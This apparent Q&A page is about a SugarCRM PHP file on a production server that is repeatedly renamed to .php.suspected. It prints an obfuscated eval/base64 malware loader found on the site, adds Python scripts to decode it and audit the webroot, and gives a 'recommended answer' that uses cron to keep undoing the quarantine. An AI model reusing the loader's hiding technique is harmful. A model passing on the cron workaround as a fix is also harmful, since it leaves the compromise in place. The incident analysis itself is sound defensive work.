Problem description
For the last 4 days, we have been facing a strange issue on our production server (AWS EC2 instance), specific to only one site, which is SugarCRM.
The issue is that the file /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times a day, with a gap of 3-4 hours. The issue occurs only for this specific site; it does not even occur for the staging replica of the same site. I even compared the code of that file on both sites, and it is the same.
We Googled and found that this kind of issue mostly happens to WordPress sites and that it could be because of an attack. But we checked our server for an attack, and there isn't any. Also, there is no virus/malware scan running on the server.
What should we do?
Update:
We found a few things after going through this link.
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
and found that there are a few files with the following sample code.
<?php
// Loader as found in the flagged files: flnftovr() maps every character of $hkbfqecms
// through the lookup table $bezzmczom (characters with no entry pass through unchanged)
// and then base64-decodes the result. base64_decode is called through a variable, so the
// literal text "base64_decode(" never appears in the file.
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
// The payload: base64 text with its characters swapped through the table, split into
// concatenated literals so the whole string never appears in one piece.
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
// The lookup table: key = character as it appears in $s, value = the real base64 character.
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
// The decoded PHP runs whenever this file is included or requested.
eval(flnftovr($s, $koicev));?>
This seems to be some malware; how do we go about removing it permanently?
Thanks
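The loader in the question can be read without running it. The following Python script is an added example, not code from the question, the answer or SugarCRM: it pulls the payload string and the lookup table out of a flagged file with two regular expressions, applies the table exactly as flnftovr() does (characters without an entry pass through), and base64-decodes the result instead of handing it to eval(). The payload as posted is 210 characters long, which is not a multiple of four, so the sample in the question is cut short; the decoder drops the dangling trailing character instead of failing on padding. On that sample the output begins with @ini_set('error, so the hidden code starts by changing PHP's error settings.

```python
"""Static decoder for the substitution-then-base64 loader posted in the question.

Added example, not code from the page. It reproduces what flnftovr() does, but in
Python and without eval(), so the hidden PHP can be read instead of executed.
"""
import base64
import re
import sys

# Copied from the loader in the question. Its payload ($s) is 210 characters, which is
# not a multiple of four, so the posted sample is cut short.
SAMPLE_LOADER = r"""<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
"""


def parse_loader(php: str) -> tuple[str, dict[str, str]]:
    """Pull the payload string and the lookup table out of the loader's source."""
    # Every 'k'=>'v' pair is a table entry; nothing else in the loader uses =>.
    table = dict(re.findall(r"'(.)'\s*=>\s*'(.)'", php))
    # The payload is the first assignment of one or more non-empty single-quoted
    # literals joined with '.', i.e. the $s = '...'.'...'; statement.
    m = re.search(r"\$\w+\s*=\s*((?:'[^']+'\s*\.?\s*)+);", php, re.S)
    if m is None:
        raise ValueError("no concatenated single-quoted literal found")
    payload = "".join(re.findall(r"'([^']+)'", m.group(1)))
    return payload, table


def unsubstitute(payload: str, table: dict[str, str]) -> str:
    """Step one of flnftovr(): table lookup per character, pass-through on a miss."""
    return "".join(table.get(ch, ch) for ch in payload)


def lenient_b64decode(text: str) -> bytes:
    """Step two, tolerant of a truncated sample: a lone trailing sextet cannot form
    a byte, so it is dropped instead of raising an incorrect-padding error."""
    text = text.rstrip("=")
    if len(text) % 4 == 1:
        text = text[:-1]
    return base64.b64decode(text + "=" * (-len(text) % 4))


def decode_loader(php: str) -> bytes:
    """What the loader would have passed to eval(), as bytes."""
    payload, table = parse_loader(php)
    return lenient_b64decode(unsubstitute(payload, table))


if __name__ == "__main__":
    # Usage: python decode_loader.py [path/to/flagged.php]; defaults to the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_LOADER
    print(decode_loader(source).decode("utf-8", errors="replace"))
```

Point it at any of the files the grep reported; with no argument it decodes the sample from the question. Because the table and the payload are extracted from the file rather than typed in, the same script works on other files that use this loader shape with a different table, and the decoded text tells you what the file would have executed.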
Recommended answer
Posting this answer, as it may help others.
- Create a file with a '.sh' extension at a location convenient for you.
- Add the following code to it.
#!/bin/sh
# Rename your_file_name.php.suspected back to your_file_name.php (only when the .suspected copy exists)
[ -f /<path_to_your_file>/your_file_name.php.suspected ] &&
  mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
- Save this file.
- Set up a cron job in crontab with the following line, for every 10 minutes (or whatever interval you need)
*/10 * * * * path_to_cron_file.sh
- Restart the crontab service.
You will find a lot of documentation on creating cron jobs on Google.
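The answer above only restores the renamed file. Before doing that, a practitioner would want to know whether other files on the site still carry the loader pattern found by the grep in the question, and which production files differ from the staging replica that the question says is unaffected. The following Python script is an added example, not code from the page, the answer or SugarCRM: it walks the production webroot, lists quarantined *.suspected files, flags files matching the question's grep pattern plus an eval() call, and compares every PHP file with the staging copy by SHA-256. The sample trees it builds are constructed for the demonstration (the loader in them is a dummy with the same shape as the one in the question), and the set of extensions treated as PHP source is an assumption.

```python
"""Audit a production webroot against its staging replica.

Added example, not code from the page, the answer or SugarCRM. It reports
quarantined *.suspected files, files carrying the loader pattern from the
question's grep together with eval(), and PHP files that differ from or are
missing in the staging copy. Only the production tree is walked.
"""
import hashlib
import re
import sys
import tempfile
from pathlib import Path

# The question's grep, `function.*for.*strlen.*isset`, plus an eval() call.
LOADER_RE = re.compile(r"function\s+\w+\s*\(.*?\bfor\s*\(.*?\bstrlen\s*\(.*?\bisset\s*\(", re.S)
EVAL_RE = re.compile(r"\beval\s*\(")
PHP_SUFFIXES = {".php", ".phtml", ".inc"}  # assumption: what counts as PHP source here


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def is_loader(path: Path) -> bool:
    """True when a file matches the loader pattern; hits still need a manual read."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return bool(LOADER_RE.search(text) and EVAL_RE.search(text))


def audit(prod: Path, staging: Path) -> dict[str, list[str]]:
    """Paths are reported relative to the production root, with forward slashes."""
    findings: dict[str, list[str]] = {"suspected": [], "loaders": [], "differs": [], "only_in_prod": []}
    for path in sorted(p for p in prod.rglob("*") if p.is_file()):
        rel = path.relative_to(prod).as_posix()
        quarantined = path.name.endswith(".suspected")
        if quarantined:
            findings["suspected"].append(rel)
        if (quarantined or path.suffix in PHP_SUFFIXES) and is_loader(path):
            findings["loaders"].append(rel)
        if path.suffix in PHP_SUFFIXES:
            twin = staging / rel
            if not twin.is_file():
                findings["only_in_prod"].append(rel)        # dropped or renamed file
            elif sha256(twin) != sha256(path):
                findings["differs"].append(rel)             # modified legitimate file
    return findings


CLEAN = "<?php\nclass MassUpdate { public function run() { return true; } }\n"
# Constructed stand-in for the loader in the question: same shape, dummy payload.
LOADER = ("<?php\nfunction abc($a, $b){$o=''; for($i=0; $i<strlen($a); $i++)"
          "{$o .= isset($b[$a[$i]]) ? $b[$a[$i]] : $a[$i];} return base64_decode($o);}\n"
          "eval(abc('eHg=', Array('x'=>'y')));\n")


def build_fixture(root: Path) -> tuple[Path, Path]:
    """Constructed sample trees, not real SugarCRM files: returns (prod, staging)."""
    prod, staging = root / "prod", root / "staging"
    for base in (prod, staging):
        (base / "include").mkdir(parents=True)
        (base / "include" / "utils.php").write_text(CLEAN)             # identical on both
    (staging / "include" / "MassUpdate.php").write_text(CLEAN)
    (staging / "index.php").write_text(CLEAN)
    (prod / "include" / "MassUpdate.php.suspected").write_text(CLEAN)  # quarantined, clean
    (prod / "index.php").write_text(CLEAN + LOADER)                    # loader appended
    (prod / "cache").mkdir()
    (prod / "cache" / "x.php").write_text(LOADER)                      # dropped, no twin
    return prod, staging


def demo() -> dict[str, list[str]]:
    """Run the audit on the constructed fixture in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        prod, staging = build_fixture(Path(tmp))
        return audit(prod, staging)


if __name__ == "__main__":
    # Usage: python audit_webroot.py /path/to/prod/public_html /path/to/staging/public_html
    result = audit(Path(sys.argv[1]), Path(sys.argv[2])) if len(sys.argv) == 3 else demo()
    for kind, paths in result.items():
        for rel in paths:
            print(f"{kind:13} {rel}")
```

Files under "loaders" and "only_in_prod" are the ones to decode and remove; files under "differs" need a diff against the staging copy, since a loader appended to a legitimate file (index.php in the fixture) shows up in both lists. The pattern match is deliberately loose, like the grep it copies, so treat a hit as something to read, not as proof on its own.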
This concludes the article on PHP files being automatically renamed to php.suspected. We hope the recommended answer helps, and thank you for supporting html5模板網!